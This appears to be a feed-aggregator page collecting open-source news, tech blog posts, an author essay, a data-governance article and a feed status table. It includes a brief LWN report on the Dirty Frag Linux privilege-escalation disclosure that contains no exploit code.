Vagrant Cascadian performed Non-Maintainer Uploads (NMUs) in Debian for several packages with outstanding patches over a year old jakarta-jmeter, wxmplot, critcl, vcsh and magic-wormhole-transit-relay.

In addition, Reproducible Builds developer Jochen Sprickerhof filed a bug against the APT package manager to request that “APT should ignore [a] 0 epoch when downloading or installing with a version specifier”. This is related to the special-case handling of the optional epoch prefix in Debian package version numbers.


In NixOS, Julien Malka presented Lila: Decentralized Build Reproducibility Monitoring for the Functional Package Management Model, a paper written together with Arnout Engelen at the Mining Software Repositories (MSR) ACM conference, where it was awarded the MSR 2026 FOSS Impact Award. Congratulations!


Lastly, in openSUSE, Michael Schroeder added reproducibility verification support in the Open Build Service [] and Bernhard M. Wiedemann posted another openSUSE monthly update for their reproducibility work there.


Patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where applicable or possible. This month, we wrote a large number of such patches, including:


diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes, including preparing and uploading versions, 316, 317 and 318 to Debian.

  • Chris Lamb:

    • Bump Standards-Version to 4.7.4. []
    • Correct ordering of python3-guestfs architecture restrictions. []
    • Limit python3-guestfs Build-Dependency to architectures that are not i386. []
    • Try to fix PYPI_ID_TOKEN debugging. []
  • Holger Levsen:

    • Add ppc64el to the list of python3-guestfs architecture whitelist. (Closes: #1132974). []

In addition, Vagrant Cascadian updated diffoscope in GNU Guix to version 317.


Documentation updates

Yet again, there were a number of improvements made to our website this month including:


Misc news

On our mailing list this month:

  • Timo Pohl posted our list inviting people to “online group discussions with 4-6 participants each to talk about your perception of terms and requirements for reproducibility.” As Timo notes:

    During our research of the existing literature, as well as my experience at the Reproducible Builds Summit 2025 in Vienna, we noticed that some of the terminology in the field is not used consistently across different groups of people, and that the precise meaning of some core terms like “reproducibility of an artifact” in itself is not uniform.

    As Timo mentions, the sessions will last roughly 90 minutes and will be rewarded with 50€ per participant.

  • kpcyrd posted to the list asking for assistance with fixing an issue after updating the flake.lock file for their repro-env project.

  • Aman Sharma of the KTH Royal Institute of Technology, Sweden, posted to our list in order to share that Eric Cornelissen, a PhD student in KTH’s CHAINS group, is maintaining an open-source project to monitor the reproducibility of GitHub Actions:

    The goal of the project is to assess whether GitHub Actions can be reproduced. Currently, it focuses on two types of Actions: JavaScript-based actions and Docker-based actions (composite actions are not considered). For JavaScript actions, the project rebuilds the distributed files and compares them bit-by-bit with the repository contents. For Docker actions, it rebuilds images from the Dockerfile and checks for semantic equivalence, using diffoci, across builds.



Finally, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

22:49

Algol 68 support in VS Code [Planet GNU]

Pietro Monteiro has added Algol 68 support syntax highlighting for VS Code. You can get the sources at https://codeberg.org/sleepy4727/supper-algol-68. He has also adapted it to add support for Algol 68 syntax highlighting in Compiler Explorer, with the help of Iain Buclaw. See how it looks at https://godbolt.org/z/84bPbbexa.

With this work VS Code joins Emacs and Vim in the happy family of editors providing syntax highlighting and indentation for Algol 68.

Thank you Pietro and Iain!

22:35

Claude just astounded me [Scripting News]

I say to Claude: btw, i would have been surprised if it was broken, that feature went in very quickly and i use it a fair amount. one of the two big pages in feedland is the Feed List page. here's a screen shot. maybe you can figure out what everything does??

Example of a Feed LIst page in FeedLand.

Claude retorts

  • Disclosure triangle — expands the row to show more about that feed (recent items, description, full URL).
  • Blue checkbox (checked) — subscription state. Checked = you're subscribed. Click to subscribe/unsubscribe.
  • Row number — just positional, 1..14 for this result set.
  • Feed title — clickable, opens the feed's own page (the other "big page" you mentioned).
  • Small tag icon next to the title — opens a categories editor for that subscription, lets you tag the feed into categories.
  • When column — last update time, with adaptive granularity: minutes for very recent ("21 mins", "26 mins"), day-of-week for the past few days ("Fri", "Tue", "Thu"), month+day after that ("Nov 22", "Mar 29"), and presumably full date for old stuff.
  • Ct column — subscriber count for the feed. Every row shows 2 because feedland.social is small. Worth noting: this is the same
  • ct that the SQL we just touched uses for
  • order by ct desc — the column visible in the UI is the sort key.
  • Green circle "i" — info popup, probably feed metadata (URL, description, last build, maybe owner).

Claude is very very smart. And I guess I got the right answers. A lot of work went into the design

The only thing it didn't guess correctly about is what the other "big page" is. It's not the Feed Info page, it's the news page, a timeline or river.

Done for the day, my last words to Claude were -- FeedLand is an important product and we're going to do right by it.

22:07

Dirty Frag: a zero-day universal Linux LPE [LWN.net]

Hyunwoo Kim has announced the Dirty Frag security flaw, a local-privilege-escalation (LPE) vulnerability similar to the recently disclosed Copy Fail flaw:

Because the embargo has now been broken, no patches or CVEs exist for these vulnerabilities. After consultation with the linux-distros@vs.openwall.org maintainers, and at the maintainers' request, I am publicly releasing this Dirty Frag document.

As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions.

Kim, who discovered the flaw and had attempted a coordinated disclosure set for May 12, has released the code for an exploit, as well as a example script to remove the vulnerable modules. A full write-up, with the disclosure timeline, is also available. It's unknown at this time whether this is an example of parallel discovery or how the third party was able to disclose it prior to the end of the embargo. We will be following up as more information comes to light.

20:42

Redox gets partial window pixel updating, tmux, and more [OSnews]

Another month, another progress report, Redox, etc. etc., you know the drill by now. This past month Redox saw improved booting on real hardware by making sure the boot process continues even if certain drivers fail or become blocked. Thanks to some changes on the RISC-V side, running Redox on real RISC-V hardware has also improved. Furthermore, tmux has been ported to Redox, CPU time reporting has been improved, and Orbital, Redox’ desktop environment, gianed support for partial window pixel updating, which should increase UI performance.

On top of that, there’s a brand new web user interface to browse Redox packages (x86-64, i586, ARM64 (aarch64), and RISC-V (riscv64gc)), as well as the usual list of improvements to the kernel, drivers, relibc, and many more areas of the operating system.

20:28

The Big Idea: Jill Rosenberg [Whatever]

While it may seem like fantasy is as far from the real world as possible, author Jill Rosenberg suggests that indulging in fantasies and fiction actually connects people instead of isolating them from reality. Dive in to the Big Idea for her newest release, Now I’m Photogenic and Other Stories I Tell Myself, and see if our desires are really just human nature.

JILL ROSENBERG:

People often think of fantasy and the imagination as ways to escape reality, but I think there’s a more complicated and fraught relationship between the two. What we long for, the ways we wish to escape—this grows out of our real experiences of the world. But the reverse is true as well: our “real” experiences are colored by our fantasies. 

We might, for example, wish to be an Olympic-level athlete, as one of my characters does, but this wish highlights the absence of her athletic talent, which may not have shown up as an absence if she’d never longed to be an elite athlete. That feeling of absence and desire drives her behavior, which changes her reality, and the resulting experience changes her understanding of herself and what she really wants.

Our imagination can’t free us from the world because our imagination is made from the world.  But it can alter the way we see things and what feels possible. The first story in my collection is called “The Logic of Imaginary Friends.” This is where I present this big idea most directly. A single mother is left lonely and longing when her eleven-year-old daughter goes to sleepaway camp for the first time, so she reunites with her imaginary friend from childhood.

It’s great at first, until one imaginary friend is not enough, no matter how she morphs him in her mind to meet her shifting needs and desires. The fantasies are fun, but not satisfying, and she begins to feel that she’s choosing this fantasy life over her life with her daughter, but does she have to choose between the two?

As a child, I used my imagination to revise reality. Every Thanksgiving I’d feel so excited for my cousins to visit. I’d imagine myself gregarious, irresistible, rehearsing all of the interactions I’d have, writing their dialogue and mine. But when they arrived, I could never be that person or get the response from them I wanted.

Later that night, however, I could rewrite the dialogue to be more plausible but equally thrilling, given what actually happened. That was always my favorite part of the holiday, alone in my room, taking what happened and transforming it into the holiday I longed for. But the bigger the gulf between my fantasies and reality, the less I was able to enjoy the fantasies or the reality.

It’s this competing desire that compelled me to write these stories: the desire to be known, seen, recognized and special, to connect with those around us, and the desire to hide what makes us unique, to pretend we’re no different from everyone else.

On the one hand, my characters are often reminding themselves of their freedom. Maybe they really can be anything they want to be, but when they try to do it, out in the world, it’s not so easy. They can’t control reality or other people’s responses the way they can control their fantasies. But the more they shy away and hide from the real world, the more that fear of reality infects their fantasies, or, in the surreal stories, the events of their fantastical lives. As a result, their fantasies and their lives get weirder and worse. 

Of course, my strange characters and the unusual things that happen to my characters all stem from my own strangeness and my unusual thoughts and experiences. In my real life, I do not always feel like showcasing the ways in which I deviate from the norm, but I am happy and proud to put my strange and unusual characters out into the world because I do think that fiction shows us new and different ways of being. 

The role of fiction, even surreal fiction, is to bring us closer to the experience of being a human in the real world. That marriage between—and tension between—dream and reality is what I find most thrilling and ultimately satisfying in both my writing and my life.


Now I’m Photogenic and Other Stories I Tell Myself: Amazon|Barnes & Noble|Bookshop|Powell’s|Watchung Booksellers

Author socials: Website|Instagram

Read an excerpt of one story from the collection: The Logic of Imaginary Friends

19:56

Setting up a Sun Ray server on OpenIndiana Hipster 2025.10 [OSnews]

Time for another Sun Ray blog post! I’ve had a few people email me asking for help setting up a Sun Ray server over the last few months, and despite my attempts to help them get it going there’s been mixed results with running SRSS on OpenIndiana Hipster 2025.10.

my Sun Ray server is still on an earlier OI snapshot, so I figured it was about time to try to actually follow the new guides myself.

↫ The Iris System

Ever since my spiraling down the Sun rabbit hole late last year, I’ve tried for a few times now to get the x86 version of OpenIndiana and Oracle Solaris working on any of my machines, exactly for the purposes of setting up a modern Sun Ray server. Sadly, none of my machines are compatible with any illumos distribution or Oracle Solaris, so I’ve been shit out of luck trying to get this side project off the ground. My Ultra 45 is sadly also not supported by any SPARC version of illumos or Oracle Solaris, so unless I buy even more hardware, my dream of a modern Sun Ray setup will have to wait.

Of course, virtualisation is an option for many, and that’s exactly what this particular guide is about: setting up OpenIndiana on a Proxmox virtual machine. I actually have a Proxmox machine up and running and could do this too, but I’m a sucker for running stuff like this on real hardware. Yes, that makes my life more complicated and difficult, and no, it’s not more noble or real or hardcore – it’s just a preference. Still, for normal people who pick up a Sun Ray or two on eBay for basically nothing, running OpenIndiana in a virtual machine is the smart, reasonable, and effective option.

19:49

Emacs Chat with Sacha Chua [Planet GNU]

Yesterday I joined Sacha Chua for a new episode of her Emacs Chat podcast, where we talked about Emacs and life. I gave a quick tour of my Emacs configuration, discussing at length my configurations for EXWM (Emacs X Window Manager) among other topics like Emacs's facility for visually indicating buffer boundaries in the fringe by setting indicate-buffer-boundaries and my convenience configuration macros.

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]​

The above video is provided with closed captions and the below transcript courtesy of Sacha with minor fixes and formatting by me. I've included some of Sacha's screenshots from our chat, you can see the rest on the episode's page on Sacha's blog.

A few links from our chat:

It was a lot of fun - thanks again for having me, Sacha!

Take care, and so long for now.

Transcript

19:07

“My favorite device is a Chromebook, without ChromeOS” [OSnews]

If you’re sick of Chrome OS on your Chromebook, or can find a Chromebook for cheap somewhere but don’t actually want to use Chrome OS, have you considered postmarketOS?

Since I was kind frustrated with ChromeOS, I decided to take a look at something that I knew supported my Lenovo Duet 3 for some time: postmarketOS. For those who don’t know, postmarketOS is an Alpine Linux based-distro focused in replacing the original OS from old phones (generally running Android) with a “true” Linux distro. They also seem to support some Chromebooks because of their unique architecture and, luckily, they support my device under the google-trogdor platform.

↫ kokada

PostmarketOS is aimed at smartphones primarily, but supports other formfactors just fine as well. The Duet 3 is one of the tablet-like devices it supports, and it seems most things are working quite well. In fact, judging by the postmarketOS wiki, quite a few Chromebooks have good support, and with Chromebooks being cheap and dime-a-dozen on eBay and similar auction sites, it seems like a great way to get started with what is trying to become a true Linux for smartphones.

18:21

When you upgrade your resource strings to Unicode, don’t forget to specify the L prefix [The Old New Thing]

Some time ago, I discussed how the Resource Compiler defaults to CP_ACP, even in the face of subtle hints that the file is UTF-8.

After yet another incident of Visual Studio secretly changing the file encoding from 1252 to UTF-8 and breaking all non-ASCII strings, combined with Azure DevOps and Visual Studio simply ignoring encoding changes when showing diffs, a colleague decided to solve the problem once and for all by using explicit Unicode escapes \x#### to represent non-ASCII characters. That way, it doesn’t matter whether the file encoding is 1252 or UTF-8 because the two code pages agree on the common ASCII subset.

What used to be

IDS_AWESOME "That’s great!"

was changed to

IDS_AWESOME "That\x2019s great!"

Unfortunately, the resulting string that appeared on screen was

That 19s great!

What went wrong?

If you are encoding Unicode into your string, you have to put an L prefix on the quoted string. Otherwise, the \xABCD sequence is interpreted as an 8-bit \xAB escape sequence, followed by two literal characters CD. In this case, the \x2019 was interpreted as \x20 (which encodes a space) followed by the literal characters 19, resulting in the string That␣19s great!.

The correct conversion includes the L prefix.

IDS_AWESOME L"That\x2019s great!"

The post When you upgrade your resource strings to Unicode, don’t forget to specify the L prefix appeared first on The Old New Thing.

16:07

[$] A new era for memory-management maintainership [LWN.net]

On April 21, Andrew Morton let it be known that he intends to begin stepping away from the maintainership of kernel's memory-management subsystem — a responsibility he has carried since before memory management was even seen as its own subsystem. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, one of the first sessions in the memory-management track was devoted to how the maintainership would be managed going forward. There are a lot of questions still to be answered.

15:21

An update on KDE's Union style engine [LWN.net]

Arjen Hiemstra has published an article on the status of the Union project: a single system to support all of KDE's technologies used for styling applications.

The work on Union's Breeze implementation has progressed to the point where it is very hard to distinguish whether or not you are running the Union version. We have also tested with a bunch of applications and made sure that any differences were fixed. So we are at a stage where we need to get Union into the hands of more people, both to get extra people testing whether there are any major issues, but also to have interested people creating new styles.

This means that with the upcoming Plasma 6.7 release, we plan to include Union. Discussion is currently ongoing whether we will enable it by default, but even if not there will be a way to try it out.

See Hiemstra's introductory article on Union, published in February 2025, for more about the project and its creation. KDE 6.7 is expected to be released in mid-June.

14:56

Link [Scripting News]

Why did Twitter win? Because the RSS developers wouldn't work with each other. Thus subscribing to a feed was complicated. In Twitter, it was one click to subscribe, and another to unsub. You could see who your friends subscribed to, again -- one click to subscribe. And eventually that grew into a list of suggestions of people to follow. RSS had none of that because the RSS devs refused to work with each other. The development of RSS-based news products stopped, and pretty soon Twitter's stopped too. And thus news technology on the web remained frozen for two decades. We are getting another chance. The social media space is a highly disappointing wreck. Users are interested in new ideas, as long as they're fun and new, esp in relation to using AI tools. But it won't be open if we can't get it together any better than we could the first time around. You have to do things that help the web, and thus help your competitors. If you don't, if we don't, there will just be another Twitter, owning the users, and they'll probably sell out to a billionaire a lot sooner than Twitter did. At some point we'll realize if we want something new we have to work with each other. Otherwise you get Elon II, III etc.

14:35

Security updates for Thursday [LWN.net]

Security updates have been issued by AlmaLinux (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), Debian (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), Fedora (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns, pyOpenSSL, squid, vim, and xorg-x11-server-Xwayland), Mageia (graphicsmagick, kernel-linus, krb5-appl, libexif, libtiff, nano, nginx, ntfs-3g, opam, perl-Net-CIDR-Lite, perl-Starlet, perl-Starman, tcpflow, and virtualbox), Oracle (dovecot, fence-agents, freeipmi, image-builder, kernel, libcap, LibRaw, libsoup, openssh, osbuild-composer, python, python-tornado, python3, systemd, thunderbird, and tigervnc), SUSE (containerd, curl, erlang, flatpak, java-11-openjdk, java-21-openjdk, java-25-openjdk, liblxc-devel, libpng12, libthrift-0_23_0, openCryptoki, openexr, openssl-3, python3, python311-social-auth-core, rclone, skim, and thunderbird), and Ubuntu (apache2, coin3, editorconfig-core, insighttoolkit, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17, linux-hwe-6.17, linux-oracle, linux-realtime, linux-realtime-6.17, linux-azure, linux-azure-6.17, linux-oem-6.17, linux-azure-5.15, linux-gcp-6.8, nghttp2, python-dynaconf, slurm-wlm, swish-e, and webkit2gtk).

13:42

CodeSOD: Failing to Fail [The Daily WTF]

Russell F (previously) sends us a small one today. It's not just a representative line, it's a representative comment. More than that, it's a true confession. Russell wrote some code, you see, and the logic was confusing. So, a co-worker added a comment to explain what the code was doing:

'This is *supposed* to fail. If it fails to fail, it throws a failure message

Russell writes:

I have to confess that this one is my fault. The comment was added by one of my coworkers to clarify what I was doing, and made me realize how stupid I'd been.

"Failing to plan is planning to fail" becomes "failing to fail is failure message".

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

13:21

The Best Risk Mitigation Strategy in Data? A Single Source of Truth [Radar]

Every data leader has a version of this story. A regulatory audit surfaces a metric that doesn’t match across systems. A board member catches conflicting revenue numbers in two reports presented back-to-back. An AI tool generates a recommendation based on data that hasn’t been governed since the analyst who built it left the company two years ago. The specifics change, but the pattern doesn’t: Somewhere in the stack, data risk turned into business risk, and nobody saw it coming.

In my first article, I covered what a semantic layer is and why it matters. In my second, I spoke with early adopters about what happens when you actually build one. This piece tackles a different angle: The semantic layer as a risk mitigation strategy. Not risk in the abstract, compliance-framework sense, but the practical, operational risk that quietly drains organizations every day—bad numbers reaching decision-makers, sensitive data reaching the wrong people, and metric changes that never fully propagate.

Three risks hiding in plain sight

Data risk tends to concentrate in three areas, and most organizations are exposed in all of them simultaneously.

The first is accuracy. Inaccurate data leading to bad decisions is the oldest problem in analytics, and it hasn’t gone away. It’s gotten worse. As organizations add more tools, more dashboards, and more AI-powered applications, the surface area for error expands. A revenue metric defined one way in a Tableau workbook, another way in a Power BI model, and a third way in a Python notebook isn’t just an inconvenience. It’s a liability. When leadership makes a strategic decision based on a number that turns out to be wrong—or, more commonly, based on a number that’s one version of right—the downstream consequences are real: misallocated resources, missed targets, eroded trust in the data team.

The second is governance and access. Most organizations have some framework for controlling who sees what data. In practice, those controls are scattered across warehouses, BI tools, individual dashboards, shared drives, and cloud storage buckets. Each system has its own permissions model, its own admin interface, and its own gaps. The result is a patchwork that’s expensive to maintain and nearly impossible to audit with confidence. Sensitive data finds its way into a dashboard it shouldn’t be in—not because someone acted maliciously, but because the governance surface area is too large to manage consistently.

The third is change management. A CFO decides that ARR should exclude trial customers starting next quarter. In theory, that’s a single metric change. In practice, it’s a scavenger hunt. That ARR calculation lives in a warehouse view, two Tableau workbooks, a Power BI model, an Excel report that someone on the FP&A team maintains manually, and now the new AI analytics tool that pulls directly from the data lake. Some of those get updated. Some don’t. Three months later, someone notices the numbers don’t match and the cycle starts again. The risk isn’t that the change was wrong—it’s that the change was never fully implemented.

These three risks—accuracy, governance, and change management—aren’t independent. They compound. An ungoverned metric that’s defined inconsistently and can’t be updated in one place is a ticking clock. The question isn’t whether it causes a problem, it’s when.

The legacy approach: more people, more tools, more problems

The traditional response to data risk has been to throw structure at it—and structure usually means people and process.

The most common pattern is the BI analyst as gatekeeper. Critical metrics, reports, and dashboards are managed by a centralized team. Need a new report? Submit a request. Need a metric change? Submit a request. Need to understand why two numbers don’t match? Submit a request and wait. This model exists because organizations don’t trust their data enough to let people self-serve, and for good reason—without a governed foundation, self-service creates chaos. But the gatekeeper model has its own costs. It’s slow. It creates bottlenecks. It’s expensive to staff. And performance is inconsistent—the quality of the output depends entirely on which analyst picks up the ticket and which tools they prefer.

Governance gets its own layer of complexity. Organizations deploy access controls across their data warehouse, BI platforms, file storage, and application layer—each with different permission models, administrators, and audit capabilities. Quality reporting, lineage, and business ownership tracking create additional tooling, complexity, and management overhead. Maintaining consistency across all of these systems is resource-intensive, and the more tools you add, the harder it gets. Most organizations know their governance has gaps. They just can’t find them all.

The combination of centralized BI teams and sprawling governance frameworks produces a predictable outcome: large, slow-moving data organizations that spend more time fixing and maintaining the infrastructure than actually delivering data or insight. When everything is managed manually across dozens of tools, problems don’t grow linearly—they grow exponentially. Every new dashboard, data source, BI tool adds another surface to govern, another place where logic can diverge, another potential point of failure. The legacy approach doesn’t scale. It just gets more expensive.

The semantic approach: govern once, access everywhere

The semantic layer offers a fundamentally different model for managing data risk. Instead of distributing control across every tool in the stack, it consolidates it.

Start with accuracy and change management because the semantic layer addresses both with the same mechanism: A single location for all metric definitions, business logic, and calculations. When ARR is defined once in the semantic layer, it’s defined once everywhere. Tableau, Power BI, Excel, Python, your AI chatbot—they all reference the same governed definition. When the CFO decides to exclude trial customers, that change happens in one place and propagates automatically to every downstream tool. No scavenger hunt. No version that got missed. No analyst discovering three months later that their workbook is still running the old logic. And when that same CFO wants to know how we calculated that same metric several years ago? Semantic layers are driven by version control by default, allowing for seamless versioning across key metrics.

This same centralization transforms governance. Instead of managing access controls across a warehouse, three BI platforms, a shared drive, and an application layer, organizations can align governance around the semantic layer itself. It becomes the single access point for governed data. Users connect to the semantic layer and pull data into the tool of their choice, but the permissions, definitions, and business logic are all managed in one place. The governance surface area shrinks from dozens of systems to one.

But the semantic layer does something else that the legacy approach can’t: it makes data self-documenting. In a traditional environment, the context around data—what a metric means, why certain records are excluded, how a calculation works—lives in the heads of analysts, in scattered documentation, or nowhere at all. The semantic layer captures that context as structured metadata alongside the models, columns, and metrics themselves. Field descriptions, metric definitions, relationship mappings, business rules—all of it is documented where the data lives, not in a wiki that nobody updates. This is what makes genuine self-service possible. When the data carries its own context, users don’t need to submit a ticket to understand what they’re looking at (and AI agents can read-it in for contextual understanding at scale).

The practical result is a shift from centralized gatekeeping to federated, hub-and-spoke delivery. The semantic layer is the hub: governed, documented, consistent. The spokes are the teams and tools that consume it. A finance analyst pulls data into Excel. A data scientist queries it in Python. An AI agent accesses it via MCP. They all get the same numbers, definitions, governance—without a centralized BI team manually ensuring consistency across every output.

Risk reduction, not risk elimination

The semantic layer doesn’t eliminate data risk. The underlying data still needs to be clean, well-structured, and maintained—as every practitioner I’ve spoken with has confirmed, garbage in still produces garbage out. And organizational alignment around metric definitions requires leadership commitment that no software can substitute for.

But the semantic layer changes the economics of data risk. Instead of scaling risk management by adding more people and more governance tools, you reduce the surface area that needs to be managed. Fewer places where logic can diverge. Fewer systems to audit. Fewer opportunities for a metric change to get lost in translation. The problems don’t disappear, but they become containable—manageable in one place rather than scattered across the entire stack.

For organizations serious about AI-driven analytics, this matters more than ever. AI tools need governed, contextualized data to produce trusted outputs. The semantic layer provides that foundation—not just as a nice-to-have for consistency, but as critical risk infrastructure for an era where the cost of bad data is accelerating.

One definition. One access point. One place to govern. That’s not just a better architecture. It’s a better risk strategy.

Feeds

FeedRSSLast fetchedNext fetched after
@ASmartBear XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
a bag of four grapes XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Ansible XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Bad Science XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Black Doggerel XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Blog - Official site of Stephen Fry XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Charlie Brooker | The Guardian XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Charlie's Diary XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Chasing the Sunset - Comics Only XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Coding Horror XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Comics Archive - Spinnyverse XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Cory Doctorow's craphound.com XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Cory Doctorow, Author at Boing Boing XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Ctrl+Alt+Del Comic XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Cyberunions XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
David Mitchell | The Guardian XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Deeplinks XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Diesel Sweeties webcomic by rstevens XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Dilbert XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Dork Tower XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Economics from the Top Down XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Edmund Finney's Quest to Find the Meaning of Life XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
EFF Action Center XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Enspiral Tales - Medium XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Events XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Falkvinge on Liberty XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Flipside XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Flipside XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Free software jobs XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Full Frontal Nerdity by Aaron Williams XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
General Protection Fault: Comic Updates XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
George Monbiot XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Girl Genius XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Groklaw XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Grrl Power XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Hackney Anarchist Group XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Hackney Solidarity Network XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://blog.llvm.org/feeds/posts/default XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://calendar.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://eng.anarchoblogs.org/feed/atom/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://feed43.com/3874015735218037.xml XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://flatearthnews.net/flatearthnews.net/blogfeed XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
http://fulltextrssfeed.com/ XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
http://london.indymedia.org/articles.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&amp;_render=rss XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://planet.gridpp.ac.uk/atom.xml XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
http://shirky.com/weblog/feed/atom/ XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://thecommune.co.uk/feed/ XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://theness.com/roguesgallery/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
http://www.baen.com/baenebooks XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.godhatesastronauts.com/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
http://www.tinycat.co.uk/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://anarchism.pageabode.com/blogs/anarcho/feed/ XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
https://broodhollow.krisstraub.comfeed/ XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://debian-administration.org/atom.xml XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://elitetheatre.org/ XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://feeds.feedburner.com/Starslip XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
https://feeds2.feedburner.com/GeekEtiquette?format=xml XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://hackbloc.org/rss.xml XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://kajafoglio.livejournal.com/data/atom/ XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
https://philfoglio.livejournal.com/data/atom/ XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://pixietrixcomix.com/eerie-cutiescomic.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://pixietrixcomix.com/menage-a-3/comic.rss XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
https://propertyistheft.wordpress.com/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://requiem.seraph-inn.com/updates.rss XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://studiofoglio.livejournal.com/data/atom/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://thecommandline.net/feed/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://torrentfreak.com/subscriptions/ XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://web.randi.org/?format=feed&type=rss XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://www.dcscience.net/feed/medium.co XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
https://www.DropCatch.com/domain/steampunkmagazine.com XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://www.DropCatch.com/domain/ubuntuweblogs.org XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://www.DropCatch.com/redirect/?domain=DyingAlone.net XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
